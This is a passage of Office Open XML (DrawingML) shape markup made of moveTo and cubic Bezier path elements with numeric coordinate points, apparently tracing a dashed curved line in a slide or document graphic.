                    <a:pt x="1972" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1971" y="494"/>
                    <a:pt x="1968" y="494"/>
                    <a:pt x="1966" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1964" y="496"/>
                    <a:pt x="1964" y="499"/>
                    <a:pt x="1965" y="500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1965" y="500"/>
                    <a:pt x="1965" y="500"/>
                    <a:pt x="1965" y="500"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1943" y="467"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="473"/>
                    <a:pt x="1950" y="478"/>
                    <a:pt x="1954" y="484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1955" y="486"/>
                    <a:pt x="1958" y="486"/>
                    <a:pt x="1960" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1961" y="484"/>
                    <a:pt x="1962" y="481"/>
                    <a:pt x="1961" y="479"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1957" y="474"/>
                    <a:pt x="1953" y="468"/>
                    <a:pt x="1950" y="463"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1948" y="461"/>
                    <a:pt x="1946" y="460"/>
                    <a:pt x="1944" y="462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1942" y="463"/>
                    <a:pt x="1942" y="465"/>
                    <a:pt x="1943" y="467"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1920" y="435"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1924" y="440"/>
                    <a:pt x="1928" y="446"/>
                    <a:pt x="1931" y="451"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1933" y="453"/>
                    <a:pt x="1935" y="453"/>
                    <a:pt x="1937" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1939" y="451"/>
                    <a:pt x="1939" y="448"/>
                    <a:pt x="1938" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1934" y="441"/>
                    <a:pt x="1930" y="435"/>
                    <a:pt x="1926" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1925" y="428"/>
                    <a:pt x="1922" y="428"/>
                    <a:pt x="1921" y="429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1919" y="431"/>
                    <a:pt x="1918" y="433"/>
                    <a:pt x="1920" y="435"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1895" y="403"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1899" y="409"/>
                    <a:pt x="1904" y="414"/>
                    <a:pt x="1908" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1909" y="421"/>
                    <a:pt x="1912" y="421"/>
                    <a:pt x="1913" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1915" y="418"/>
                    <a:pt x="1915" y="416"/>
                    <a:pt x="1914" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1910" y="409"/>
                    <a:pt x="1906" y="404"/>
                    <a:pt x="1902" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1900" y="397"/>
                    <a:pt x="1898" y="396"/>
                    <a:pt x="1896" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1894" y="399"/>
                    <a:pt x="1894" y="402"/>
                    <a:pt x="1895" y="403"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1870" y="373"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="378"/>
                    <a:pt x="1878" y="383"/>
                    <a:pt x="1883" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1884" y="390"/>
                    <a:pt x="1887" y="390"/>
                    <a:pt x="1888" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1890" y="387"/>
                    <a:pt x="1890" y="385"/>
                    <a:pt x="1889" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1884" y="378"/>
                    <a:pt x="1880" y="373"/>
                    <a:pt x="1876" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="366"/>
                    <a:pt x="1872" y="366"/>
                    <a:pt x="1870" y="367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1868" y="369"/>
                    <a:pt x="1868" y="371"/>
                    <a:pt x="1870" y="373"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1843" y="343"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1848" y="348"/>
                    <a:pt x="1852" y="353"/>
                    <a:pt x="1856" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="360"/>
                    <a:pt x="1860" y="360"/>
                    <a:pt x="1862" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1864" y="357"/>
                    <a:pt x="1864" y="354"/>
                    <a:pt x="1862" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="348"/>
                    <a:pt x="1853" y="343"/>
                    <a:pt x="1849" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="336"/>
                    <a:pt x="1845" y="336"/>
                    <a:pt x="1843" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1842" y="339"/>
                    <a:pt x="1841" y="342"/>
                    <a:pt x="1843" y="343"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1815" y="315"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1820" y="319"/>
                    <a:pt x="1825" y="324"/>
                    <a:pt x="1829" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1831" y="330"/>
                    <a:pt x="1833" y="330"/>
                    <a:pt x="1835" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1836" y="327"/>
                    <a:pt x="1836" y="325"/>
                    <a:pt x="1835" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1830" y="318"/>
                    <a:pt x="1826" y="314"/>
                    <a:pt x="1821" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1819" y="307"/>
                    <a:pt x="1817" y="307"/>
                    <a:pt x="1815" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1814" y="311"/>
                    <a:pt x="1814" y="313"/>
                    <a:pt x="1815" y="315"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1786" y="287"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1791" y="292"/>
                    <a:pt x="1796" y="296"/>
                    <a:pt x="1801" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1802" y="302"/>
                    <a:pt x="1805" y="302"/>
                    <a:pt x="1806" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1808" y="299"/>
                    <a:pt x="1808" y="296"/>
                    <a:pt x="1806" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1801" y="290"/>
                    <a:pt x="1797" y="286"/>
                    <a:pt x="1792" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1790" y="280"/>
                    <a:pt x="1788" y="280"/>
                    <a:pt x="1786" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1785" y="283"/>
                    <a:pt x="1785" y="286"/>
                    <a:pt x="1786" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1786" y="287"/>
                    <a:pt x="1786" y="287"/>
                    <a:pt x="1786" y="287"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1756" y="261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1761" y="265"/>
                    <a:pt x="1766" y="269"/>
                    <a:pt x="1771" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1773" y="275"/>
                    <a:pt x="1776" y="275"/>
                    <a:pt x="1777" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1779" y="272"/>
                    <a:pt x="1778" y="269"/>
                    <a:pt x="1777" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="263"/>
                    <a:pt x="1767" y="259"/>
                    <a:pt x="1762" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1760" y="253"/>
                    <a:pt x="1757" y="253"/>
                    <a:pt x="1756" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1754" y="257"/>
                    <a:pt x="1755" y="259"/>
                    <a:pt x="1756" y="261"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1725" y="235"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1731" y="240"/>
                    <a:pt x="1736" y="244"/>
                    <a:pt x="1741" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1743" y="249"/>
                    <a:pt x="1745" y="249"/>
                    <a:pt x="1747" y="247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1748" y="246"/>
                    <a:pt x="1748" y="243"/>
                    <a:pt x="1746" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1741" y="237"/>
                    <a:pt x="1736" y="233"/>
                    <a:pt x="1730" y="229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1729" y="228"/>
                    <a:pt x="1726" y="228"/>
                    <a:pt x="1725" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1723" y="231"/>
                    <a:pt x="1724" y="234"/>
                    <a:pt x="1725" y="235"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1694" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1699" y="215"/>
                    <a:pt x="1704" y="219"/>
                    <a:pt x="1710" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1711" y="224"/>
                    <a:pt x="1714" y="224"/>
                    <a:pt x="1715" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1717" y="221"/>
                    <a:pt x="1716" y="218"/>
                    <a:pt x="1715" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1709" y="213"/>
                    <a:pt x="1704" y="209"/>
                    <a:pt x="1698" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1697" y="203"/>
                    <a:pt x="1694" y="204"/>
                    <a:pt x="1693" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1691" y="207"/>
                    <a:pt x="1692" y="210"/>
                    <a:pt x="1694" y="211"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1661" y="188"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1666" y="192"/>
                    <a:pt x="1672" y="196"/>
                    <a:pt x="1677" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1679" y="201"/>
                    <a:pt x="1682" y="200"/>
                    <a:pt x="1683" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1684" y="197"/>
                    <a:pt x="1684" y="194"/>
                    <a:pt x="1682" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1677" y="189"/>
                    <a:pt x="1671" y="185"/>
                    <a:pt x="1665" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1664" y="180"/>
                    <a:pt x="1661" y="181"/>
                    <a:pt x="1660" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1659" y="185"/>
                    <a:pt x="1659" y="187"/>
                    <a:pt x="1661" y="188"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1627" y="167"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1633" y="170"/>
                    <a:pt x="1639" y="174"/>
                    <a:pt x="1644" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1646" y="178"/>
                    <a:pt x="1649" y="178"/>
                    <a:pt x="1650" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1651" y="174"/>
                    <a:pt x="1650" y="172"/>
                    <a:pt x="1649" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1643" y="167"/>
                    <a:pt x="1637" y="163"/>
                    <a:pt x="1632" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1630" y="159"/>
                    <a:pt x="1627" y="159"/>
                    <a:pt x="1626" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1625" y="163"/>
                    <a:pt x="1626" y="165"/>
                    <a:pt x="1627" y="167"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1593" y="146"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1599" y="149"/>
                    <a:pt x="1605" y="153"/>
                    <a:pt x="1610" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1612" y="157"/>
                    <a:pt x="1615" y="157"/>
                    <a:pt x="1616" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="153"/>
                    <a:pt x="1616" y="150"/>
                    <a:pt x="1614" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1609" y="146"/>
                    <a:pt x="1603" y="143"/>
                    <a:pt x="1597" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1595" y="138"/>
                    <a:pt x="1593" y="139"/>
                    <a:pt x="1592" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1590" y="143"/>
                    <a:pt x="1591" y="145"/>
                    <a:pt x="1593" y="146"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1558" y="127"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1564" y="130"/>
                    <a:pt x="1570" y="133"/>
                    <a:pt x="1576" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1578" y="138"/>
                    <a:pt x="1580" y="137"/>
                    <a:pt x="1581" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1582" y="133"/>
                    <a:pt x="1581" y="130"/>
                    <a:pt x="1579" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1574" y="126"/>
                    <a:pt x="1568" y="123"/>
                    <a:pt x="1562" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1560" y="119"/>
                    <a:pt x="1557" y="120"/>
                    <a:pt x="1556" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1555" y="124"/>
                    <a:pt x="1556" y="126"/>
                    <a:pt x="1558" y="127"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1522" y="109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1528" y="112"/>
                    <a:pt x="1534" y="115"/>
                    <a:pt x="1540" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1542" y="119"/>
                    <a:pt x="1544" y="118"/>
                    <a:pt x="1545" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1546" y="114"/>
                    <a:pt x="1546" y="112"/>
                    <a:pt x="1544" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1538" y="108"/>
                    <a:pt x="1532" y="105"/>
                    <a:pt x="1526" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1524" y="101"/>
                    <a:pt x="1521" y="102"/>
                    <a:pt x="1520" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1519" y="106"/>
                    <a:pt x="1520" y="108"/>
                    <a:pt x="1522" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1522" y="109"/>
                    <a:pt x="1522" y="109"/>
                    <a:pt x="1522" y="109"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1486" y="93"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1492" y="95"/>
                    <a:pt x="1498" y="98"/>
                    <a:pt x="1504" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1506" y="102"/>
                    <a:pt x="1508" y="101"/>
                    <a:pt x="1509" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1510" y="97"/>
                    <a:pt x="1509" y="94"/>
                    <a:pt x="1507" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1501" y="91"/>
                    <a:pt x="1495" y="88"/>
                    <a:pt x="1489" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1487" y="85"/>
                    <a:pt x="1484" y="86"/>
                    <a:pt x="1484" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1483" y="90"/>
                    <a:pt x="1484" y="92"/>
                    <a:pt x="1486" y="93"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1449" y="78"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1455" y="80"/>
                    <a:pt x="1461" y="83"/>
                    <a:pt x="1467" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1469" y="86"/>
                    <a:pt x="1472" y="85"/>
                    <a:pt x="1472" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1473" y="81"/>
                    <a:pt x="1472" y="79"/>
                    <a:pt x="1470" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1464" y="75"/>
                    <a:pt x="1458" y="73"/>
                    <a:pt x="1451" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1449" y="70"/>
                    <a:pt x="1447" y="71"/>
                    <a:pt x="1446" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1445" y="75"/>
                    <a:pt x="1446" y="77"/>
                    <a:pt x="1449" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1449" y="78"/>
                    <a:pt x="1449" y="78"/>
                    <a:pt x="1449" y="78"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1411" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1417" y="66"/>
                    <a:pt x="1424" y="69"/>
                    <a:pt x="1430" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1432" y="72"/>
                    <a:pt x="1434" y="70"/>
                    <a:pt x="1435" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1436" y="66"/>
                    <a:pt x="1435" y="64"/>
                    <a:pt x="1432" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1426" y="61"/>
                    <a:pt x="1420" y="59"/>
                    <a:pt x="1413" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1411" y="56"/>
                    <a:pt x="1409" y="57"/>
                    <a:pt x="1408" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1408" y="61"/>
                    <a:pt x="1409" y="63"/>
                    <a:pt x="1411" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1411" y="64"/>
                    <a:pt x="1411" y="64"/>
                    <a:pt x="1411" y="64"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1373" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1379" y="54"/>
                    <a:pt x="1386" y="56"/>
                    <a:pt x="1392" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1394" y="59"/>
                    <a:pt x="1396" y="57"/>
                    <a:pt x="1397" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1398" y="53"/>
                    <a:pt x="1396" y="51"/>
                    <a:pt x="1394" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1388" y="48"/>
                    <a:pt x="1382" y="46"/>
                    <a:pt x="1375" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1373" y="44"/>
                    <a:pt x="1371" y="45"/>
                    <a:pt x="1370" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1369" y="49"/>
                    <a:pt x="1371" y="51"/>
                    <a:pt x="1373" y="52"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1334" y="41"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1341" y="43"/>
                    <a:pt x="1347" y="45"/>
                    <a:pt x="1354" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1356" y="47"/>
                    <a:pt x="1358" y="46"/>
                    <a:pt x="1359" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1359" y="42"/>
                    <a:pt x="1358" y="39"/>
                    <a:pt x="1356" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1349" y="37"/>
                    <a:pt x="1343" y="35"/>
                    <a:pt x="1336" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1334" y="33"/>
                    <a:pt x="1332" y="34"/>
                    <a:pt x="1331" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1331" y="39"/>
                    <a:pt x="1332" y="41"/>
                    <a:pt x="1334" y="41"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1296" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1302" y="34"/>
                    <a:pt x="1309" y="35"/>
                    <a:pt x="1315" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1317" y="37"/>
                    <a:pt x="1319" y="36"/>
                    <a:pt x="1320" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1320" y="31"/>
                    <a:pt x="1319" y="29"/>
                    <a:pt x="1317" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1310" y="27"/>
                    <a:pt x="1304" y="26"/>
                    <a:pt x="1297" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1295" y="24"/>
                    <a:pt x="1293" y="25"/>
                    <a:pt x="1292" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1292" y="30"/>
                    <a:pt x="1293" y="32"/>
                    <a:pt x="1296" y="32"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1256" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1263" y="26"/>
                    <a:pt x="1269" y="27"/>
                    <a:pt x="1276" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1278" y="29"/>
                    <a:pt x="1280" y="27"/>
                    <a:pt x="1281" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1281" y="23"/>
                    <a:pt x="1280" y="21"/>
                    <a:pt x="1278" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="19"/>
                    <a:pt x="1264" y="18"/>
                    <a:pt x="1258" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1256" y="16"/>
                    <a:pt x="1254" y="18"/>
                    <a:pt x="1253" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1253" y="22"/>
                    <a:pt x="1254" y="24"/>
                    <a:pt x="1256" y="24"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1217" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1224" y="19"/>
                    <a:pt x="1230" y="20"/>
                    <a:pt x="1237" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1239" y="21"/>
                    <a:pt x="1241" y="20"/>
                    <a:pt x="1241" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1242" y="16"/>
                    <a:pt x="1240" y="14"/>
                    <a:pt x="1238" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1231" y="12"/>
                    <a:pt x="1225" y="11"/>
                    <a:pt x="1218" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1216" y="10"/>
                    <a:pt x="1214" y="11"/>
                    <a:pt x="1214" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1213" y="16"/>
                    <a:pt x="1215" y="18"/>
                    <a:pt x="1217" y="18"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1177" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1184" y="14"/>
                    <a:pt x="1191" y="15"/>
                    <a:pt x="1197" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1199" y="16"/>
                    <a:pt x="1201" y="14"/>
                    <a:pt x="1202" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1202" y="10"/>
                    <a:pt x="1200" y="8"/>
                    <a:pt x="1198" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1192" y="7"/>
                    <a:pt x="1185" y="6"/>
                    <a:pt x="1178" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1176" y="5"/>
                    <a:pt x="1174" y="7"/>
                    <a:pt x="1174" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1174" y="11"/>
                    <a:pt x="1175" y="13"/>
                    <a:pt x="1177" y="13"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1138" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1144" y="10"/>
                    <a:pt x="1151" y="11"/>
                    <a:pt x="1157" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1160" y="12"/>
                    <a:pt x="1162" y="10"/>
                    <a:pt x="1162" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1162" y="6"/>
                    <a:pt x="1160" y="4"/>
                    <a:pt x="1158" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1151" y="3"/>
                    <a:pt x="1145" y="3"/>
                    <a:pt x="1138" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1136" y="2"/>
                    <a:pt x="1134" y="4"/>
                    <a:pt x="1134" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1134" y="8"/>
                    <a:pt x="1135" y="10"/>
                    <a:pt x="1138" y="10"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1098" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="8"/>
                    <a:pt x="1111" y="9"/>
                    <a:pt x="1118" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1120" y="9"/>
                    <a:pt x="1122" y="7"/>
                    <a:pt x="1122" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1122" y="3"/>
                    <a:pt x="1120" y="1"/>
                    <a:pt x="1118" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1111" y="1"/>
                    <a:pt x="1105" y="0"/>
                    <a:pt x="1098" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1096" y="0"/>
                    <a:pt x="1094" y="2"/>
                    <a:pt x="1094" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1094" y="6"/>
                    <a:pt x="1096" y="8"/>
                    <a:pt x="1098" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1098" y="8"/>
